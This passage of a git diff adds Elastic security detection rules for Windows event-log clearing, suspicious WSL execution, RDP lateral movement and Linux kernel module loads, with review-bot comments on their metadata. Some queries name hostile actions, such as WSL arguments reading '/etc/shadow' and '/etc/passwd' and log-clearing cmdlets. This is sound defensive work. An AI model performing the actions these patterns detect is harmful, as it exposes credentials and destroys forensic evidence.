"required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "3d00feab-e203-4acc-a463-c3e15b7e9a73", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + 
"name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1190", + "name": "Exploit Public-Facing Application", + "reference": "https://attack.mitre.org/techniques/T1190/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "3d00feab-e203-4acc-a463-c3e15b7e9a73_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_105.json b/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_105.json new file mode 100644 index 00000000000..33953cf7b2e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_105.json 
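Review bot: The `index` list includes `logs-system.security*` but `related_integrations` names only `endpoint` and `windows`, whereas the other rules in this diff that read that pattern also declare `{ "package": "system", "version": "^1.6.4" }`; the same entry should be declared here so the dependency is visible to package validation. Separately, `csc.exe` appears only in the `process.name` set and not in the `?process.pe.original_file_name` set, so a renamed compiler binary is not caught; if its PE original file name is `csc.exe` (worth confirming), add it to the second list as well. A `risk_score` 73 rule with no `note` investigation guide and no `setup` section is also thinner than its siblings in this diff; a short triage guide naming the `ScreenConnect.Service.exe` parent and the child processes an administrator would legitimately expect would help analysts.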
@@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of Cmdlets and methods related to Windows event log deletion activities. This is often done by attackers in an attempt to evade detection or destroy forensic evidence on a system.", + "filters": [ + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Management\\\\*.psd1" + } + } + } + } + ], + "from": "now-119m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Log Clear Capabilities", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"Clear-EventLog\" or\n \"Remove-EventLog\" or\n (\"Eventing.Reader.EventLogSession\" and \".ClearLog\") or\n (\"Diagnostics.EventLog\" and \".Clear\")\n ) and\n not powershell.file.script_block_text : (\n \"CmdletsToExport=@(\\\"Add-Content\\\"\"\n )\n", + "references": [ + "https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventlog.clear", + "https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventing.reader.eventlogsession.clearlog" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 21, + "rule_id": "3d3aa8f9-12af-441f-9344-9f31053e316d", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit 
Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.001", + "name": "Clear Windows Event Logs", + "reference": "https://attack.mitre.org/techniques/T1070/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "3d3aa8f9-12af-441f-9344-9f31053e316d_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_4.json b/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_4.json new file mode 100644 index 00000000000..c46ec22c907 --- /dev/null 
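Review bot: The `filters` exclusion in this version keys on `file.path`, but `required_fields` no longer lists it, while the superseded `_4` and `_5` versions below (same `rule_id`) still declare `{ "ecs": true, "name": "file.path", "type": "keyword" }`; if `required_fields` is meant to cover every field the rule reads, add that entry back, and if it is derived from `query` alone this omission is expected. Note also that the filter value is narrowed to `?:\\Windows\\system32\\...` whereas the older query matched any drive directory via `?\:\\*\\system32`, which is presumably intended but changes what the exclusion covers. The `_4` and `_5` hunks are historic versions and get no separate note.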
+++ b/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_4.json 
@@ -0,0 +1,114 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of Cmdlets and methods related to Windows event log deletion activities. This is often done by attackers in an attempt to evade detection or destroy forensic evidence on a system.", + "from": "now-119m", + "index": [ + "winlogbeat-*", + "logs-windows.*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Log Clear Capabilities", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"Clear-EventLog\" or\n \"Remove-EventLog\" or\n (\"Eventing.Reader.EventLogSession\" and \".ClearLog\") or\n (\"Diagnostics.EventLog\" and \".Clear\")\n ) and\n not file.path : (\n ?\\:\\\\\\\\*\\\\\\\\system32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\Modules\\\\\\\\Microsoft.PowerShell.Management\\\\\\\\*.psd1\n ) and\n not powershell.file.script_block_text : (\n \"CmdletsToExport=@(\\\"Add-Content\\\"\"\n )\n", + "references": [ + "https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventlog.clear", + "https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventing.reader.eventlogsession.clearlog" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 21, + "rule_id": "3d3aa8f9-12af-441f-9344-9f31053e316d", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows 
PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.001", + "name": "Clear Windows Event Logs", + "reference": "https://attack.mitre.org/techniques/T1070/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 4 + }, + "id": "3d3aa8f9-12af-441f-9344-9f31053e316d_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_5.json b/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_5.json new file mode 100644 index 00000000000..68b7abcd2dd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_5.json 
@@ -0,0 +1,114 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of Cmdlets and methods related to Windows event log deletion activities. This is often done by attackers in an attempt to evade detection or destroy forensic evidence on a system.", + "from": "now-119m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Log Clear Capabilities", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"Clear-EventLog\" or\n \"Remove-EventLog\" or\n (\"Eventing.Reader.EventLogSession\" and \".ClearLog\") or\n (\"Diagnostics.EventLog\" and \".Clear\")\n ) and\n not file.path : (\n ?\\:\\\\\\\\*\\\\\\\\system32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\Modules\\\\\\\\Microsoft.PowerShell.Management\\\\\\\\*.psd1\n ) and\n not powershell.file.script_block_text : (\n \"CmdletsToExport=@(\\\"Add-Content\\\"\"\n )\n", + "references": [ + "https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventlog.clear", + "https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventing.reader.eventlogsession.clearlog" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 21, + "rule_id": "3d3aa8f9-12af-441f-9344-9f31053e316d", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative 
Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.001", + "name": "Clear Windows Event Logs", + "reference": "https://attack.mitre.org/techniques/T1070/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 5 + }, + "id": "3d3aa8f9-12af-441f-9344-9f31053e316d_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3e0561b5-3fac-4461-84cc-19163b9aaa61_3.json b/packages/security_detection_engine/kibana/security_rule/3e0561b5-3fac-4461-84cc-19163b9aaa61_3.json new file mode 100644 index 00000000000..2806dcf5f09 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3e0561b5-3fac-4461-84cc-19163b9aaa61_3.json 
@@ -0,0 +1,61 @@ +{ + "attributes": { + "anomaly_threshold": 70, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected a high count of destination IPs establishing an RDP connection with a single source IP. Once an attacker has gained access to one system, they might attempt to access more in the network in search of valuable assets, data, or further access points.", + "from": "now-12h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "lmd_high_rdp_distinct_count_destination_ip_for_source", + "name": "Spike in Number of Connections Made from a Source IP", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/lmd", + "https://www.elastic.co/blog/detecting-lateral-movement-activity-a-new-kibana-integration", + "https://www.elastic.co/blog/remote-desktop-protocol-connections-elastic-security" + ], + "related_integrations": [ + { + "package": "lmd", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "risk_score": 21, + "rule_id": "3e0561b5-3fac-4461-84cc-19163b9aaa61", + "setup": "## Setup\n\nThe rule requires the Lateral Movement Detection integration assets to be installed, as well as file and Windows RDP process events collected by the Elastic Defend integration. \n\n### Lateral Movement Detection Setup\nThe Lateral Movement Detection integration detects lateral movement activity by identifying abnormalities in file and Windows RDP events. 
Anomalies are detected using Elastic's Anomaly Detection feature.\n\n#### Prerequisite Requirements:\n- Fleet is required for Lateral Movement Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows RDP process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n#### The following steps should be executed to install assets associated with the Lateral Movement Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Lateral Movement Detection and select the integration to see more details about it.\n- Under Settings, click Install Lateral Movement Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Lateral Movement Detection, you'll need to enable the corresponding Anomaly Detection jobs.\n- Before enabling the Anomaly Detection jobs, confirm that the Pivot Transform asset is installed and actively gathering data in the destination index `ml-rdp-lmd`.\n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". 
Select the Data View containing your transformed RDP process data i.e.`ml-rdp-lmd`.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/lmd/kibana/ml_module/lmd-ml.json) configuration file, you will see a card for Lateral Movement Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Lateral Movement Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "3e0561b5-3fac-4461-84cc-19163b9aaa61_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3e0eeb75-16e8-4f2f-9826-62461ca128b7_6.json b/packages/security_detection_engine/kibana/security_rule/3e0eeb75-16e8-4f2f-9826-62461ca128b7_6.json new file mode 100644 index 00000000000..30b299eaa04 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3e0eeb75-16e8-4f2f-9826-62461ca128b7_6.json 
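Review bot: The `tags` array lists both `"Rule Type: ML"` and `"Rule Type: Machine Learning"`, redundant labels for the same property; keep one, as the other rules in this diff use a single `Rule Type:` value. The `name` "Spike in Number of Connections Made from a Source IP" also reads differently from the `description` and the `machine_learning_job_id` `lmd_high_rdp_distinct_count_destination_ip_for_source`, which describe a high distinct count of destination IPs rather than connection volume; a name such as `"Spike in Number of Distinct RDP Destinations from a Source IP"` would match the job semantics, assuming the job id reflects what the job detects.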
@@ -0,0 +1,147 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects Linux Bash commands from the the Windows Subsystem for Linux. Adversaries may enable and use WSL for Linux to avoid detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Execution via Windows Subsystem for Linux", + "query": "process where host.os.type == \"windows\" and event.type : \"start\" and\n (\n (\n (process.executable : \"?:\\\\Windows\\\\System32\\\\bash.exe\" or ?process.pe.original_file_name == \"Bash.exe\") and \n not process.command_line : (\"bash\", \"bash.exe\")\n ) or \n process.executable : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Packages\\\\*\\\\rootfs\\\\usr\\\\bin\\\\bash\" or \n (\n process.parent.name : \"wsl.exe\" and ?process.parent.command_line : \"bash*\" and not process.name : \"wslhost.exe\"\n ) or \n (\n process.name : \"wsl.exe\" and process.args : (\n \"curl\", \"/etc/shadow\", \"/etc/passwd\", \"cat\", \"--system\", \"root\", \"-e\", \"--exec\", \"bash\", \"/mnt/c/*\"\n ) and not process.args : (\"wsl-bootstrap\", \"docker-desktop-data\", \"*.vscode-server*\")\n )\n ) and \n not process.parent.executable : (\"?:\\\\Program Files\\\\Docker\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\Docker\\\\*.exe\")\n", + "references": [ + "https://blog.f-secure.com/hunting-for-windows-subsystem-for-linux/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/", + "https://blog.qualys.com/vulnerabilities-threat-research/2022/03/22/implications-of-windows-subsystem-for-linux-for-adversaries-defenders-part-1" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": 
"event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "3e0eeb75-16e8-4f2f-9826-62461ca128b7", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1202", + "name": "Indirect Command Execution", + "reference": "https://attack.mitre.org/techniques/T1202/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "3e0eeb75-16e8-4f2f-9826-62461ca128b7_6", + "type": "security-rule" +} \ No newline at end 
of file diff --git a/packages/security_detection_engine/kibana/security_rule/3e12a439-d002-4944-bc42-171c0dcb9b96_3.json b/packages/security_detection_engine/kibana/security_rule/3e12a439-d002-4944-bc42-171c0dcb9b96_3.json new file mode 100644 index 00000000000..1128d6d76ad --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3e12a439-d002-4944-bc42-171c0dcb9b96_3.json 
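Review bot: The `description` contains a doubled word, `"Detects Linux Bash commands from the the Windows Subsystem for Linux"`; it should read `"Detects Linux Bash commands from the Windows Subsystem for Linux"`. This rule also ships without a `note` investigation guide even though its `query` has several distinct branches (a `bash.exe` launch, a distro `rootfs` bash path, a `wsl.exe` parent with a `bash*` command line, and `wsl.exe` with sensitive arguments such as `/etc/shadow`), so a short triage section explaining which branch fired and the Docker and VS Code exclusions already in the query would help analysts.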
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Detects the loading of a Linux kernel module through system calls. Threat actors may leverage Linux kernel modules to load a rootkit on a system providing them with complete control and the ability to hide from security products. As other rules monitor for the addition of Linux kernel modules through system utilities or .ko files, this rule covers the gap that evasive rootkits leverage by monitoring for kernel module additions on the lowest level through auditd_manager.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Kernel Driver Load", + "query": "driver where host.os.type == \"linux\" and event.action == \"loaded-kernel-module\" and\nauditd.data.syscall in (\"init_module\", \"finit_module\")\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.syscall", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "3e12a439-d002-4944-bc42-171c0dcb9b96", + "setup": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. 
\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-a always,exit -F arch=b64 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules\n-a always,exit -F arch=b32 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "severity": "low", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + 
"type": "eql", + "version": 3 + }, + "id": "3e12a439-d002-4944-bc42-171c0dcb9b96_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3e12a439-d002-4944-bc42-171c0dcb9b96_4.json b/packages/security_detection_engine/kibana/security_rule/3e12a439-d002-4944-bc42-171c0dcb9b96_4.json new file mode 100644 index 00000000000..cc1921cc53d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3e12a439-d002-4944-bc42-171c0dcb9b96_4.json 
@@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the loading of a Linux kernel module through system calls. Threat actors may leverage Linux kernel modules to load a rootkit on a system providing them with complete control and the ability to hide from security products. As other rules monitor for the addition of Linux kernel modules through system utilities or .ko files, this rule covers the gap that evasive rootkits leverage by monitoring for kernel module additions on the lowest level through auditd_manager.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Kernel Driver Load", + "query": "driver where host.os.type == \"linux\" and event.action == \"loaded-kernel-module\" and\nauditd.data.syscall in (\"init_module\", \"finit_module\")\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.syscall", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "3e12a439-d002-4944-bc42-171c0dcb9b96", + "setup": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. 
\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-a always,exit -F arch=b64 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules\n-a always,exit -F arch=b32 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "severity": "low", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + 